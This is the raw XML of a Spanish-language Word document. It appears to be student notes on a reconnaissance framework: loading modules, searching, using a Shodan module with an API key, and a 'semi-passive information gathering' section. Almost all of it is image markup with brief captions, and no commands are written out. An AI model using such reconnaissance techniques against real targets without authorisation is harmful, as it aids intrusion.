          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AC82D9D" wp14:editId="0522C8D9">
            <wp:extent cx="4968671" cy="1996613"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="14947018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1815" name="Imagen 1" descr="Texto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36FD" w14:textId="3F3EFE8C" w:rsidR="008537BE" w:rsidRDefault="008537BE" w:rsidP="00C35F29">
      <w:r w:rsidRPr="008537BE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EB806EA" wp14:editId="1A8F091A">
            <wp:extent cx="6858000" cy="3938270"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="17290489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48915" name="Imagen 1" descr="Texto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F504" w14:textId="2D20A8DF" w:rsidR="001626AF" w:rsidRDefault="001626AF" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Para instalar un modulo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3EBEB0" w14:textId="687AF605" w:rsidR="001626AF" w:rsidRPr="001626AF" w:rsidRDefault="00F31BEC" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F31BEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="503CF974" wp14:editId="3D7BF528">
            <wp:extent cx="4953429" cy="701101"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="230686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6434" name="Imagen 1" descr="Texto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62CE" w14:textId="2DA9DE1B" w:rsidR="005054D7" w:rsidRDefault="00F31BEC" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Para comprobar si se instalo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548413E5" w14:textId="64708699" w:rsidR="00F31BEC" w:rsidRDefault="00711593" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711593">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BE886A7" wp14:editId="58E09D86">
            <wp:extent cx="5006774" cy="1310754"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="1153088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8171" name="Imagen 1" descr="Texto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3534" w14:textId="618CCDFF" w:rsidR="009C0C89" w:rsidRDefault="009C0C89" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Buscamos search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E8B25F" w14:textId="01E34E8A" w:rsidR="009C0C89" w:rsidRDefault="009C0C89" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C0C89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0848BF1B" wp14:editId="2360566C">
            <wp:extent cx="4023709" cy="1242168"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18176744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4481" name="Imagen 1" descr="Texto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4D95" w14:textId="352360A5" w:rsidR="00BD0123" w:rsidRDefault="00BD0123" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Para cargar el modulo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C862A9" w14:textId="6B0DEABD" w:rsidR="00BD0123" w:rsidRDefault="00F94694" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94694">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FF3455B" wp14:editId="5B047E70">
            <wp:extent cx="4740051" cy="1265030"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="12973007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072" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto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60D1" w14:textId="7F7B7A27" w:rsidR="00EE07C4" w:rsidRDefault="00EE07C4" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Para establecer el parámetro de búsqueda para UDEMY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03059BE7" w14:textId="08B9327A" w:rsidR="00EE07C4" w:rsidRDefault="00EE07C4" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE07C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43D23262" wp14:editId="492553AD">
            <wp:extent cx="6248942" cy="3977985"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="20826895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9551" name="Imagen 1" descr="Texto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741C" w14:textId="5EE17D48" w:rsidR="00EE07C4" w:rsidRDefault="00EE07C4" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lo listamos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CAD33D" w14:textId="77A3AB83" w:rsidR="00EE07C4" w:rsidRDefault="00EE07C4" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE07C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CF7AB83" wp14:editId="360B322F">
            <wp:extent cx="6149873" cy="1806097"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="24116268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62680" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto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5D5A" w14:textId="77777777" w:rsidR="001726A6" w:rsidRDefault="001726A6" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C01CD8" w14:textId="77777777" w:rsidR="001726A6" w:rsidRDefault="001726A6" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C20DC4D" w14:textId="77777777" w:rsidR="001726A6" w:rsidRDefault="001726A6" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A329B6F" w14:textId="77777777" w:rsidR="001726A6" w:rsidRDefault="001726A6" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D8A6F0" w14:textId="1EAAA303" w:rsidR="001726A6" w:rsidRDefault="001726A6" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Para hecharlo a andar con el comando run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1076577A" w14:textId="40769E4C" w:rsidR="001726A6" w:rsidRDefault="001726A6" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001726A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21A39EBB" wp14:editId="1D74BA0F">
            <wp:extent cx="4458086" cy="3177815"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="14097430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3057" name="Imagen 1" descr="Texto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7EE" w14:textId="11123C24" w:rsidR="007A5F13" w:rsidRDefault="007A5F13" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Para poder acceder a contactos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428B85A1" w14:textId="3D407856" w:rsidR="007A5F13" w:rsidRDefault="007A5F13" w:rsidP="00C35F29">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5F13">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D555980" wp14:editId="045DA5DD">
            <wp:extent cx="6858000" cy="1774190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27493237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32370" name="Imagen 1" descr="Captura de pantalla de un celular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109" w14:textId="4670CB9F" w:rsidR="00425B06" w:rsidRDefault="00425B06" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ahora para cargar un modulo de shodan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7547E272" w14:textId="74C94B7A" w:rsidR="00425B06" w:rsidRDefault="00E96E1F" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96E1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="696182E0" wp14:editId="5E73DDA9">
            <wp:extent cx="5799323" cy="2994920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="120389580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580" name="Imagen 1" descr="Pantalla de computadora con letras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917" w14:textId="1BF5E775" w:rsidR="00161AE8" w:rsidRDefault="00161AE8" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ese es para descargar un modulo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F455AB" w14:textId="6C706B33" w:rsidR="00161AE8" w:rsidRDefault="00161AE8" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00161AE8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FCD7D83" wp14:editId="0DDD037C">
            <wp:extent cx="5806943" cy="2400508"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="89236027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0277" name="Imagen 1" descr="Pantalla de computadora con letras&#10;&#10;El contenido generado por IA puede ser incorrec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9D20" w14:textId="48299BB4" w:rsidR="00FF1BD2" w:rsidRDefault="00FF1BD2" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF1BD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F4715A3" wp14:editId="180C7BA9">
            <wp:extent cx="6233700" cy="1318374"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="336884902" name="Imagen 1" descr="Captura de pantall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902" name="Imagen 1" descr="Captura de pantalla con letras&#10;&#10;El contenido generado por IA puede ser incorrec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C6E" w14:textId="06FEDE14" w:rsidR="00FF1BD2" w:rsidRDefault="00FF1BD2" w:rsidP="00C35F29">
      <w:r>
        <w:t>Ahí se agrega la api key de shodan</w:t>
      </w:r>
      <w:r w:rsidR="00D12B75">
        <w:t xml:space="preserve"> y hacerlo correr (en nuestro caso no corre no se porque problemas de api key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A528FC9" w14:textId="0EE62E3C" w:rsidR="00D12B75" w:rsidRDefault="00D12B75" w:rsidP="00C35F29">
      <w:r w:rsidRPr="00D12B75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F886EC4" wp14:editId="5AE7ADE6">
            <wp:extent cx="6218459" cy="4077053"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13421326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2693" name="Imagen 1" descr="Captura de pantalla de computadora&#10;&#10;El contenido generado por IA puede ser incorrecto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EBD2" w14:textId="77777777" w:rsidR="00D755C4" w:rsidRDefault="00D755C4" w:rsidP="00C35F29"/>
    <w:p w14:paraId="78D7C42C" w14:textId="2F025034" w:rsidR="00D755C4" w:rsidRDefault="00D755C4" w:rsidP="00C35F29">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00D755C4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06CB9EC8" wp14:editId="62F6B140">
            <wp:extent cx="6858000" cy="2555875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18023856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85615" name="Imagen 1" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto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284A" w14:textId="1914AE57" w:rsidR="00FE760C" w:rsidRDefault="00FE760C" w:rsidP="00C35F29">
      <w:r>
        <w:t>Ahí esta para descargar para guardar el xml o html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECDEB6C" w14:textId="7C9B1B69" w:rsidR="00FE760C" w:rsidRPr="00FF1BD2" w:rsidRDefault="00FE760C" w:rsidP="00C35F29">
      <w:r w:rsidRPr="00FE760C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65779037" wp14:editId="358027DE">
            <wp:extent cx="6858000" cy="2879725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="92988833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8335" name="Imagen 1" descr="Captura de pantalla de computadora&#10;&#10;El contenido generado por IA puede ser incorrecto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E593" w14:textId="7B4B9D32" w:rsidR="00161AE8" w:rsidRDefault="00FE760C" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE760C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EDA8233" wp14:editId="018670F8">
            <wp:extent cx="6378493" cy="1531753"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="18506297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9748" name="Imagen 1" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto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DC2" w14:textId="77777777" w:rsidR="001726A6" w:rsidRDefault="001726A6" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DABEC3D" w14:textId="77777777" w:rsidR="00D4478B" w:rsidRDefault="00D4478B" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D36A5E2" w14:textId="77777777" w:rsidR="00D4478B" w:rsidRDefault="00D4478B" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32BA75DC" w14:textId="77777777" w:rsidR="00D4478B" w:rsidRDefault="00D4478B" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E8AC0CD" w14:textId="77777777" w:rsidR="00D4478B" w:rsidRDefault="00D4478B" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07A66E26" w14:textId="34C14C6E" w:rsidR="00D4478B" w:rsidRDefault="00DD0606" w:rsidP="00C35F2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DF786C" wp14:editId="7CC97D44">
            <wp:extent cx="6858000" cy="2979420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2783028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CE2BA51" wp14:editId="2DADBA1C">
            <wp:extent cx="6858000" cy="3162300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19352483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FE073AC" wp14:editId="237A80D9">
            <wp:extent cx="6858000" cy="3307080"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1151509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5438490" wp14:editId="769DEC2D">
            <wp:extent cx="6850380" cy="3124200"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="19961734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F698F55" wp14:editId="26F4213F">
            <wp:extent cx="6850380" cy="3855720"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="97093515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64ABA80" wp14:editId="06DEE508">
            <wp:extent cx="6850380" cy="4213860"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="5981667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5A49C60" wp14:editId="37E70540">
            <wp:extent cx="6850380" cy="4099560"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="21371463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6D74" w14:textId="77777777" w:rsidR="006D4D78" w:rsidRDefault="006D4D78" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11FEC3BA" w14:textId="77777777" w:rsidR="006D4D78" w:rsidRDefault="006D4D78" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35063B3B" w14:textId="77777777" w:rsidR="006D4D78" w:rsidRDefault="006D4D78" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68B805DC" w14:textId="77777777" w:rsidR="006D4D78" w:rsidRDefault="006D4D78" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C266948" w14:textId="77777777" w:rsidR="006D4D78" w:rsidRDefault="006D4D78" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40723E47" w14:textId="77777777" w:rsidR="006D4D78" w:rsidRDefault="006D4D78" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20588AAF" w14:textId="77777777" w:rsidR="006D4D78" w:rsidRDefault="006D4D78" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BEC132E" w14:textId="77777777" w:rsidR="006D4D78" w:rsidRDefault="006D4D78" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28252772" w14:textId="77777777" w:rsidR="006D4D78" w:rsidRDefault="006D4D78" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71CEA823" w14:textId="77777777" w:rsidR="006D4D78" w:rsidRDefault="006D4D78" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6979EC1F" w14:textId="77777777" w:rsidR="006D4D78" w:rsidRDefault="006D4D78" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74192523" w14:textId="77777777" w:rsidR="006D4D78" w:rsidRDefault="006D4D78" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76C096CF" w14:textId="77777777" w:rsidR="006D4D78" w:rsidRDefault="006D4D78" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A16695E" w14:textId="77777777" w:rsidR="006D4D78" w:rsidRDefault="006D4D78" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11901FB7" w14:textId="77777777" w:rsidR="006D4D78" w:rsidRDefault="006D4D78" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FF6FC57" w14:textId="77777777" w:rsidR="006D4D78" w:rsidRDefault="006D4D78" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B87DBF" w14:textId="77777777" w:rsidR="006D4D78" w:rsidRDefault="006D4D78" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47BE5378" w14:textId="57D9B119" w:rsidR="006D4D78" w:rsidRDefault="006D4D78">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2D3A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Recopilación </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>semi-</w:t>
      </w:r>
      <w:r w:rsidRPr="005A2D3A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pasiva de información</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B5CE76" w14:textId="093D0E3F" w:rsidR="006D4D78" w:rsidRDefault="00B941CC" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B941CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06582D54" wp14:editId="053B8735">
            <wp:extent cx="6858000" cy="4603750"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="12574434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43419" name="Imagen 1" descr="Texto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F14" w14:textId="77777777" w:rsidR="00332142" w:rsidRDefault="00332142" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B005C11" w14:textId="77777777" w:rsidR="00332142" w:rsidRDefault="00332142" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04CCABD1" w14:textId="77777777" w:rsidR="00332142" w:rsidRDefault="00332142" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="783F0446" w14:textId="77777777" w:rsidR="00332142" w:rsidRDefault="00332142" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ACC240C" w14:textId="77777777" w:rsidR="00332142" w:rsidRDefault="00332142" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7837B016" w14:textId="77777777" w:rsidR="00332142" w:rsidRDefault="00332142" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294D9A3B" w14:textId="77777777" w:rsidR="00332142" w:rsidRDefault="00332142" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4474D8ED" w14:textId="77777777" w:rsidR="00332142" w:rsidRDefault="00332142" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55F3FC47" w14:textId="77777777" w:rsidR="00332142" w:rsidRDefault="00332142" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14EBCE95" w14:textId="77777777" w:rsidR="00332142" w:rsidRDefault="00332142" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6019B55E" w14:textId="77777777" w:rsidR="00332142" w:rsidRDefault="00332142" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0EB704" w14:textId="77777777" w:rsidR="00332142" w:rsidRDefault="00332142" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BEE28C9" w14:textId="77777777" w:rsidR="00332142" w:rsidRDefault="00332142" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E96295A" w14:textId="77777777" w:rsidR="00332142" w:rsidRDefault="00332142" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
